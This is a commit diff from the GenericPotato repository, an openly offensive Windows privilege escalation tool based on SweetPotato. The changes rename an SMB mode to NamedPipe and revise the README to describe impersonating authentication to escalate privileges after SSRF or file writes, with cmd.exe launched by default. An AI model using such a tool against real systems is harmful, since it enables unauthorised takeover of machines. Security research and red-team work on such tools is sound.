Minor updates

Shanzem · Apr 2, 2021 · 39aba95 · 39aba95
1 parent ed21e11
commit 39aba95
Show file tree

Hide file tree

Showing 3 changed files with 7 additions and 7 deletions.
diff --git a/PotatoAPI.cs b/PotatoAPI.cs
@@ -30,7 +30,7 @@ internal class PotatoAPI {
         public enum Mode
         {
             HTTP,
-            SMB
+            NamedPipe
         }
 
         public IntPtr Token {
@@ -48,7 +48,7 @@ public PotatoAPI(ushort port, string host, Mode mode) {
 
             switch (mode)
             {
-                case Mode.SMB:
+                case Mode.NamedPipe:
                     listener = new Thread(NamedPipeListener);
                     listener.Start();
                     break;

diff --git a/Program.cs b/Program.cs
@@ -20,7 +20,7 @@ static void Main(string[] args) {
             string program = @"c:\Windows\System32\cmd.exe";
             string programArgs = null;
             ExecutionMethod executionMethod = ExecutionMethod.Auto;
-            PotatoAPI.Mode mode = PotatoAPI.Mode.SMB;
+            PotatoAPI.Mode mode = PotatoAPI.Mode.NamedPipe;
             bool showHelp = false;
 
             Console.WriteLine(
@@ -32,7 +32,7 @@ static void Main(string[] args) {
                 .Add<ExecutionMethod>("m=|method=", "Auto,User,Thread (default Auto)", v => executionMethod = v)
                 .Add("p=|prog=", "Program to launch (default cmd.exe)", v => program = v)
                 .Add("a=|args=", "Arguments for program (default null)", v => programArgs = v)
-                .Add<PotatoAPI.Mode>("e=|exploit=", "Exploit mode [HTTP|SMB(default)] ", v => mode = v)
+                .Add<PotatoAPI.Mode>("e=|exploit=", "Exploit mode [HTTP|NamedPipe(default)] ", v => mode = v)
                 .Add<ushort>("l=|port=", "HTTP port to listen on (default 8888)", v => port = v)
                 .Add("i=|host=", "HTTP host to listen on (default 127.0.0.1)", v => host = v)
                 .Add("h|help", "Display this help", v => showHelp = v != null);

diff --git a/README.md b/README.md
@@ -1,6 +1,6 @@
 # GenericPotato
-### A modified version of SweetPotato by @_EthicalChaos_ to support generic HTTP/SMB.
-### Background and explanation to come soon.
+### A modified version of SweetPotato by @_EthicalChaos_ to support impersonating authentication over HTTP and/or named pipes. This allows for local privilege escalation from SSRF and/or file writes.
+### For background and explanation see https://micahvandeusen.com/the-power-of-seimpersonation/
 
 ```
 GenericPotato by @micahvandeusen
@@ -9,7 +9,7 @@ GenericPotato by @micahvandeusen
   -m, --method=VALUE         Auto,User,Thread (default Auto)
   -p, --prog=VALUE           Program to launch (default cmd.exe)
   -a, --args=VALUE           Arguments for program (default null)
-  -e, --exploit=VALUE        Exploit mode [HTTP|SMB(default)]
+  -e, --exploit=VALUE        Exploit mode [HTTP|NamedPipe(default)]
   -l, --port=VALUE           HTTP port to listen on (default 8888)
   -i, --host=VALUE           HTTP host to listen on (default 127.0.0.1)
   -h, --help                 Display this help